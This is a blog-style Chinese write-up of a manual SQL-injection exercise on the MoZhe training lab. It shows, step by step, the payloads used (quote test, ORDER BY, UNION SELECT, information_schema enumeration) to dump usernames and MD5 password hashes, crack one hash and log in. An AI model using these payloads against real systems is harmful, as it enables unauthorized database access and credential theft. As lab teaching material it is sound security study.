MOZHE SQL手工注入漏洞测试(MySQL数据库)

主界面URL没有参数,无法判断是否有注入点

点击公告

【浏览器不便于查看返回包可以用burp】

测试URL 

参数后加上单引号,报错,说明存在注入点
http://124.70.64.48:40021/new_list.php?id=1'

获取表列数

order by 4  返回200
order by 5  返回500
id 所在表有4列

爆显位

让id=-1,使前半段查询出错,让后半段查询结果显示出来
填充数字个数等于列刚才得到的列数
http://124.70.64.48:40021/new_list.php?id=-1%20union%20select%201,2,3,4

获取信息

在显位上查询以下信息:
version()                数据库版本5.7.22-0ubuntu0.16.04.1
user()                   用户root@localhost
@@version_compile_os     操作系统Linux
database()               数据库名字mozhe_Discuz_StormGroup

知道数据库名字,到information_schema里查数据库中的表

group_concat() 将结果连接起来,避免显示不完整
information_schema.tables记录了所有表的信息
information_schema.tables的table_schema列记录了表对应的数据库
information_schema.tables的table_name列记录了表名

union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'

该数据库有两个表StormGroup_member,notice

知道表名查列名

group_concat() 将结果连接起来,避免显示不完整
information_schema.columns记录了所有列的信息
information_schema.columns的table_name列记录了列对应的表
information_schema.columns的column_name列记录了列名

union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'

该数据库有列:id,name,password,status

知道列名查字段

union select 1,group_concat(name),group_concat(password),4 from mozhe_Discuz_StormGroup.StormGroup_member

name:mozhe,mozhe
password:356f589a7df439f6f744ff19bb8092c0,ae0af42ea5d582a11a9c994a96a2002e

密码为MD5加密,md5在线解密

第二个密码209883正确。(查看status列就知道,第一个账号status为0,登录不了)

成功登录,获取key

  • 8
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值